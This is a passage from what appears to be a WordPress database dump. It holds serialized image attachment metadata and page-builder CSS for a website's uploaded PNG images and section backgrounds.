\"mime-type\";s:9:\"image/png\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:31:\"Untitled-design-79-1170x500.png\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:30:\"Untitled-design-79-880x380.png\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:30:\"Untitled-design-79-880x587.png\";s:5:\"width\";i:880;s:6:\"height\";i:587;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:30:\"Untitled-design-79-450x350.png\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:30:\"Untitled-design-79-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"square\";a:4:{s:4:\"file\";s:30:\"Untitled-design-79-450x450.png\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1624,2112,'_wpb_shortcodes_custom_css','.vc_custom_1604627459650{padding-top: 237px !important;padding-bottom: 237px !important;}'),(1623,2111,'_wpb_shortcodes_custom_css','.vc_custom_1603899826716{padding-top: 237px !important;padding-bottom: 237px !important;}.vc_custom_1603899245380{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #333333 !important;}'),(1667,2130,'_wp_attached_file','2021/02/SamDemma-Logo-SocialIcon-02.png'),(1668,2130,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2084;s:6:\"height\";i:2084;s:4:\"file\";s:39:\"2021/02/SamDemma-Logo-SocialIcon-02.png\";s:5:\"sizes\";a:14:{s:6:\"medium\";a:4:{s:4:\"file\";s:39:\"SamDemma-Logo-SocialIcon-02-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:41:\"SamDemma-Logo-SocialIcon-02-1024x1024.png\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"SamDemma-Logo-SocialIcon-02-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:39:\"SamDemma-Logo-SocialIcon-02-768x768.png\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:41:\"SamDemma-Logo-SocialIcon-02-1536x1536.png\";s:5:\"width\";i:1536;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:41:\"SamDemma-Logo-SocialIcon-02-2048x2048.png\";s:5:\"width\";i:2048;s:6:\"height\";i:2048;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:39:\"SamDemma-Logo-SocialIcon-02-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:41:\"SamDemma-Logo-SocialIcon-02-1670x1670.png\";s:5:\"width\";i:1670;s:6:\"height\";i:1670;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:40:\"SamDemma-Logo-SocialIcon-02-1170x500.png\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:39:\"SamDemma-Logo-SocialIcon-02-880x380.png\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:39:\"SamDemma-Logo-SocialIcon-02-880x880.png\";s:5:\"width\";i:880;s:6:\"height\";i:880;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:39:\"SamDemma-Logo-SocialIcon-02-450x350.png\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:39:\"SamDemma-Logo-SocialIcon-02-450x450.png\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"square\";a:4:{s:4:\"file\";s:39:\"SamDemma-Logo-SocialIcon-02-450x450.png\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1421,2038,'_wp_attached_file','2020/10/Untitled-design-27-copy.png'),(1415,2035,'_wp_attached_file','2020/10/imageedit_13_9220096051.png'),(1416,2035,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:1600;s:4:\"file\";s:35:\"2020/10/imageedit_13_9220096051.png\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"imageedit_13_9220096051-225x300.png\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"imageedit_13_9220096051-768x1024.png\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"imageedit_13_9220096051-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"imageedit_13_9220096051-768x1024.png\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:37:\"imageedit_13_9220096051-1152x1536.png\";s:5:\"width\";i:1152;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:35:\"imageedit_13_9220096051-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:36:\"imageedit_13_9220096051-1170x500.png\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:35:\"imageedit_13_9220096051-880x380.png\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:36:\"imageedit_13_9220096051-880x1173.png\";s:5:\"width\";i:880;s:6:\"height\";i:1173;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:35:\"imageedit_13_9220096051-450x350.png\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:35:\"imageedit_13_9220096051-450x600.png\";s:5:\"width\";i:450;s:6:\"height\";i:600;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"square\";a:4:{s:4:\"file\";s:35:\"imageedit_13_9220096051-450x450.png\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1417,2036,'_wp_attached_file','2020/10/imageedit_9_7943099367.png'),(1418,2036,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:178;s:4:\"file\";s:34:\"2020/10/imageedit_9_7943099367.png\";s:5:\"sizes\";a:9:{s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"imageedit_9_7943099367-300x53.png\";s:5:\"width\";i:300;s:6:\"height\";i:53;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"imageedit_9_7943099367-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:34:\"imageedit_9_7943099367-768x137.png\";s:5:\"width\";i:768;s:6:\"height\";i:137;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:34:\"imageedit_9_7943099367-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:34:\"imageedit_9_7943099367-880x178.png\";s:5:\"width\";i:880;s:6:\"height\";i:178;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:34:\"imageedit_9_7943099367-880x157.png\";s:5:\"width\";i:880;s:6:\"height\";i:157;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:34:\"imageedit_9_7943099367-450x178.png\";s:5:\"width\";i:450;s:6:\"height\";i:178;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:33:\"imageedit_9_7943099367-450x80.png\";s:5:\"width\";i:450;s:6:\"height\";i:80;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"square\";a:4:{s:4:\"file\";s:34:\"imageedit_9_7943099367-450x178.png\";s:5:\"width\";i:450;s:6:\"height\";i:178;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1419,2037,'_wp_attached_file','2020/10/imageedit_7_3676711981.png'),(1420,2037,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:900;s:6:\"height\";i:358;s:4:\"file\";s:34:\"2020/10/imageedit_7_3676711981.png\";s:5:\"sizes\";a:9:{s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"imageedit_7_3676711981-300x119.png\";s:5:\"width\";i:300;s:6:\"height\";i:119;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"imageedit_7_3676711981-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:34:\"imageedit_7_3676711981-768x305.png\";s:5:\"width\";i:768;s:6:\"height\";i:305;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:34:\"imageedit_7_3676711981-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:34:\"imageedit_7_3676711981-880x358.png\";s:5:\"width\";i:880;s:6:\"height\";i:358;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:34:\"imageedit_7_3676711981-880x350.png\";s:5:\"width\";i:880;s:6:\"height\";i:350;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:34:\"imageedit_7_3676711981-450x350.png\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:34:\"imageedit_7_3676711981-450x179.png\";s:5:\"width\";i:450;s:6:\"height\";i:179;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"square\";a:4:{s:4:\"file\";s:34:\"imageedit_7_3676711981-450x358.png\";s:5:\"width\";i:450;s:6:\"height\";i:358;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1422,2038,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:150;s:4:\"file\";s:35:\"2020/10/Untitled-design-27-copy.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"Untitled-design-27-copy-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:35:\"Untitled-design-27-copy-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1423,2039,'_wp_attached_file','2020/10/Untitled-design-27.png'),(1424,2039,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:150;s:4:\"file\";s:30:\"2020/10/Untitled-design-27.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"Untitled-design-27-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:30:\"Untitled-design-27-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1425,2040,'_wp_attached_file','2020/10/Untitled-design-28.png'),(1426,2040,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:150;s:4:\"file\";s:30:\"2020/10/Untitled-design-28.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"Untitled-design-28-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:30:\"Untitled-design-28-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1427,2041,'_wp_attached_file','2020/10/Untitled-design-29.png'),(1428,2041,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:150;s:4:\"file\";s:30:\"2020/10/Untitled-design-29.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"Untitled-design-29-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:30:\"Untitled-design-29-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1429,623,'_edit_last','1'),(1430,2042,'_wpb_shortcodes_custom_css','.vc_custom_1603897511894{padding-top: 237px !important;padding-bottom: 237px !important;}.vc_custom_1603898590928{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #131313 !important;}.vc_custom_1405099060231{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i11.jpg?id=536) !important;}.vc_custom_1406483332545{border-top-width: 1px !important;border-bottom-width: 1px !important;padding-bottom: 50px !important;background-color: #fdfdfd !important;border-color: #eeeeee !important;border-style: solid !important;}.vc_custom_1405099363182{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i21.jpg?id=537) !important;}.vc_custom_1406709610245{padding-top: 100px !important;padding-bottom: 100px !important;}.vc_custom_1410480231107{padding-top: 0px !important;background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/06/testimonials-1.jpg?id=924) !important;}.vc_custom_1404037588724{padding-bottom: 70px !important;}.vc_custom_1403955268505{margin-bottom: -15px !important;padding-bottom: 0px !important;}.vc_custom_1409759211052{padding-bottom: 80px !important;}.vc_custom_1405099662664{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i31.jpg?id=538) !important;}.vc_custom_1403956257324{background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405099917341{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i41.jpg?id=539) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405099958560{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}.vc_custom_1404125302141{padding-bottom: 70px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405424323297{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}.vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1406709465308{padding-top: 60px !important;}.vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1406709472224{padding-top: 60px !important;}.vc_custom_1405099308623{margin-bottom: -250px !important;}'),(1432,2043,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:300;s:4:\"file\";s:32:\"2020/10/Untitled-design-27-1.png\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"Untitled-design-27-1-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"Untitled-design-27-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:32:\"Untitled-design-27-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:32:\"Untitled-design-27-1-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:32:\"Untitled-design-27-1-450x225.png\";s:5:\"width\";i:450;s:6:\"height\";i:225;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"square\";a:4:{s:4:\"file\";s:32:\"Untitled-design-27-1-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1433,2044,'_wp_attached_file','2020/10/Untitled-design-27-copy-2.png'),(1434,2044,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:300;s:4:\"file\";s:37:\"2020/10/Untitled-design-27-copy-2.png\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"Untitled-design-27-copy-2-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"Untitled-design-27-copy-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:37:\"Untitled-design-27-copy-2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:37:\"Untitled-design-27-copy-2-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:37:\"Untitled-design-27-copy-2-450x225.png\";s:5:\"width\";i:450;s:6:\"height\";i:225;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"square\";a:4:{s:4:\"file\";s:37:\"Untitled-design-27-copy-2-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1435,2045,'_wp_attached_file','2020/10/Untitled-design-28-copy.png'),(1436,2045,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:300;s:4:\"file\";s:35:\"2020/10/Untitled-design-28-copy.png\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"Untitled-design-28-copy-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"Untitled-design-28-copy-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:35:\"Untitled-design-28-copy-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:35:\"Untitled-design-28-copy-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:35:\"Untitled-design-28-copy-450x225.png\";s:5:\"width\";i:450;s:6:\"height\";i:225;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"square\";a:4:{s:4:\"file\";s:35:\"Untitled-design-28-copy-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1437,2046,'_wp_attached_file','2020/10/Untitled-design-29-copy.png'),(1438,2046,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:300;s:4:\"file\";s:35:\"2020/10/Untitled-design-29-copy.png\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"Untitled-design-29-copy-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"Untitled-design-29-copy-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:35:\"Untitled-design-29-copy-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:35:\"Untitled-design-29-copy-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:35:\"Untitled-design-29-copy-450x225.png\";s:5:\"width\";i:450;s:6:\"height\";i:225;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"square\";a:4:{s:4:\"file\";s:35:\"Untitled-design-29-copy-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1439,2047,'_wp_attached_file','2020/10/Untitled-design-30.png'),(1440,2047,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:300;s:4:\"file\";s:30:\"2020/10/Untitled-design-30.png\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"Untitled-design-30-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"Untitled-design-30-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;